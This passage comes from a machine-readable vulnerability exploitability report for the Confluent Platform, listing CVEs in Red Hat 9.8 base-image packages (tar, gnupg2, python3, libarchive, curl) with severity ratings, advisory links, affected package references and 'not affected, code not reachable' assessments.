          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-57062",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "CMS (Cryptographic Message Syntax) parsing in gpgsm in GnuPG through 2.5.20 mishandles the CMS format for AES-GCM because aes-ICVlen is supposed to be 12 bytes but 4 bytes is accepted. NOTE: this is related to CVE-2026-34182.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-57062"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-57062"
        },
        {
          "url": "https://blog.calif.io/p/how-to-format-a-ciphertext"
        },
        {
          "url": "https://github.com/advisories/GHSA-m6x2-4hhh-669j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57062"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57062"
        },
        {
          "url": "https://www.gnupg.org/download"
        },
        {
          "url": "https://www.gnupg.org/download/"
        }
      ],
      "published": "2026-06-23T18:18:10+00:00",
      "updated": "2026-06-25T20:16:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5713",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121,
        125
      ],
      "description": "The \"profiling.sampling\" module (Python 3.15+) and \"asyncio introspection capabilities\" (3.14+, \"python -m asyncio ps\" and \"python -m asyncio pstree\") features could be used to read and write addresses in a privileged process if that process connected to a malicious or \"infected\" Python process via the remote debugging feature. This vulnerability requires persistently and repeatedly connecting to the process to be exploited, even after the connecting process crashes with high likelihood due to ASLR.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5713"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/15/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19176"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5713"
        },
        {
          "url": "https://bugzilla.redhat.com/2431367"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/2458239"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458239"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5713"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19176.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19019"
        },
        {
          "url": "https://github.com/python/cpython/commit/289fd2c97a7e5aecb8b69f94f5e838ccfeee7e67"
        },
        {
          "url": "https://github.com/python/cpython/commit/316f6265b7f9ca4ffed5346b747475ef1943f35d"
        },
        {
          "url": "https://github.com/python/cpython/issues/148178"
        },
        {
          "url": "https://github.com/python/cpython/pull/148187"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-5713.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19176.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/OG4RHARYSNIE22GGOMVMCRH76L5HKPLM/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5713"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5713"
        }
      ],
      "published": "2026-04-14T16:16:48+00:00",
      "updated": "2026-07-31T14:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5745",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libarchive. A NULL pointer dereference vulnerability exists in the ACL parsing logic, specifically within the archive_acl_from_text_nl() function. When processing a malformed ACL string (such as a bare \"d\" or \"default\" tag without subsequent fields), the function fails to perform adequate validation before advancing the pointer. An attacker can exploit this by providing a maliciously crafted archive, causing an application utilizing the libarchive API (such as bsdtar) to crash, resulting in a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5745"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5745"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455921"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5745"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5745"
        }
      ],
      "published": "2026-04-07T16:16:32+00:00",
      "updated": "2026-06-17T10:59:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5773",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        918
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection for SMB(S)\ntransfers.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a network transfer operation that was requested by an\napplication could wrongfully reuse an existing SMB connection to the same\nserver that was using a different 'share' than the new subsequent transfer\nshould.\n\nThis could in unlucky situations lead to the download of the wrong file or the\nupload of a file to the wrong place. When this happens, the same credentials\nare used and the server name is the same.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5773"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5773"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5773.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-rp9q-8q5w-ch44"
        },
        {
          "url": "https://hackerone.com/reports/3650689"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5773"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5773"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T10:59:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
